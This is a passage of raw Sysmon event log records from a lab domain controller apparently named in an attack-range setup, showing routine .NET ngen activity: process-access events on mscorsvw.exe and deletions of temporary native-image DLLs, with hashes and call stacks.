icrosoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023208Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.839{4DB9351A-A27A-60D3-8905-00000000CF01}6896NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\TKIP9K5UUF\Microsoft.Windows.FileServer.Management.ServerManagerProxy.ni.dll.auxMD5=B0E0E00787F3843C7F8C297E0283BFB0,SHA256=31DB045391A57A85A3A924EB4B2F6B5AF54A5664C67C23E5B3BCFEC4680F4F41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023207Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.839{4DB9351A-A27A-60D3-8905-00000000CF01}6896NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\TKIP9K5UUF\Microsoft.Windows.FileServer.Management.ServerManagerProxy.ni.dllMD5=40C57180E934D667E669AA492CD71485,SHA256=C68AFA135A9AC339A89906612988559A7EBD4D2DDAC303A716B9603268336C25,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023206Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:06.824{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27A-60D3-8905-00000000CF01}6896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023205Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.808{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27A-60D3-8905-00000000CF01}6896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023204Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:06.808{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27A-60D3-8905-00000000CF01}6896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023203Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.793{4DB9351A-A27A-60D3-8805-00000000CF01}6856NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MQ1QNPQX05\Microsoft.Windows.FileServer.Management.Plugin.UI.ni.dll.auxMD5=95D3F6AD9854814BB074F94177DC1895,SHA256=3E907D394CB0EDBA4C155D7827AE7CF59350807067E409D6F0E11520C823BCF3,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023202Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.793{4DB9351A-A27A-60D3-8805-00000000CF01}6856NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MQ1QNPQX05\Microsoft.Windows.FileServer.Management.Plugin.UI.ni.dllMD5=1D5A75A7B95A247E157151DD4D6C56BD,SHA256=489C84192101C29A142A0610F43A1414F09B26DA90EE5E89AE48A19254D74C18,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023201Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.339{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27A-60D3-8805-00000000CF01}6856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023200Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.324{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A27A-60D3-8805-00000000CF01}6856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 
10341000x800000000000000023199Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.324{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27A-60D3-8805-00000000CF01}6856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023198Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.324{4DB9351A-A279-60D3-8705-00000000CF01}5960NT 
AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\FUGFYSVA5A\Microsoft.Windows.FileServer.Management.Plugin.ni.dll.auxMD5=C1724E743C7AF9D7B10D64A311B0BF5A,SHA256=F1F69D03C325BD675B31289A5966B55949800E2C75E920F310DAF607AFE1B256,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023197Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.324{4DB9351A-A279-60D3-8705-00000000CF01}5960NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\FUGFYSVA5A\Microsoft.Windows.FileServer.Management.Plugin.ni.dllMD5=C5608F24B372292E4D81D6246C1FA292,SHA256=E75077BEAE93572F979136A93DAE5F10D4F8103204C85893515B5066A369BE70,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023263Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.699{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27B-60D3-9405-00000000CF01}6956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023262Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:07.683{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27B-60D3-9405-00000000CF01}6956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023261Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.683{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27B-60D3-9405-00000000CF01}6956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 
23542300x800000000000000023260Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.683{4DB9351A-A27B-60D3-9305-00000000CF01}6640NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\JTM9HFONJO\Microsoft.Windows.ServerManager.NPASRole.Plugin.ni.dll.auxMD5=B165B9CC80ECBBCF987F572DAA8DF177,SHA256=08DAD8CC5DC5E47374436DF1AE63DA872C90692D0E8B0C6419E043126A793C42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023259Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.683{4DB9351A-A27B-60D3-9305-00000000CF01}6640NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\JTM9HFONJO\Microsoft.Windows.ServerManager.NPASRole.Plugin.ni.dllMD5=2EECFAA954CB3067C6B581547F686517,SHA256=6DB97DF497BF358338BB3168C6283FD22B5C5E4CCB3343E2E153064BE84929D4,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023258Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.668{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27B-60D3-9305-00000000CF01}6640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000023257Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.636{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27B-60D3-9305-00000000CF01}6640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023256Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.636{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27B-60D3-9305-00000000CF01}6640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023255Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.636{4DB9351A-A27B-60D3-9205-00000000CF01}4276NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\790ETG5Q93\Microsoft.Windows.ServerManager.Ipam.Plugin.ni.dll.auxMD5=CCBBFD4CC6A82A490770A45916ADDBAB,SHA256=3344449579F764CBE8C11BEC352C3FD2F6DBFAD6B696EB816A014928B6608CC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023254Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.636{4DB9351A-A27B-60D3-9205-00000000CF01}4276NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\790ETG5Q93\Microsoft.Windows.ServerManager.Ipam.Plugin.ni.dllMD5=F61EAB241943C60A443B008F9434BFBD,SHA256=4D1777553E0F292188CD21B30849420489594E06010B69348F3CEB173E9878FB,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023253Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.621{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27B-60D3-9205-00000000CF01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000023252Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.574{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A27B-60D3-9205-00000000CF01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023251Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.574{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27B-60D3-9205-00000000CF01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023250Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.574{4DB9351A-A27B-60D3-9105-00000000CF01}1080NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\QH11JG0B9Q\Microsoft.Windows.ServerManager.HyperV.Plugin.ni.dll.auxMD5=C5A3DF521B62C9D99A1F62CB1EEC1220,SHA256=4AC1B842AD6FDBE74ED0C287CE1ACF125F35B3A8D69E7E6536E51106B0F0443D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023249Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.574{4DB9351A-A27B-60D3-9105-00000000CF01}1080NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\QH11JG0B9Q\Microsoft.Windows.ServerManager.HyperV.Plugin.ni.dllMD5=4C68E9B4E17953FA33695592630AF9F6,SHA256=ED3A9209CB88044DA07B057774E73EC20283ED05E7B0066524F39C347CCD688A,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023248Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.527{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27B-60D3-9105-00000000CF01}1080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000023247Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.511{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A27B-60D3-9105-00000000CF01}1080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023246Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 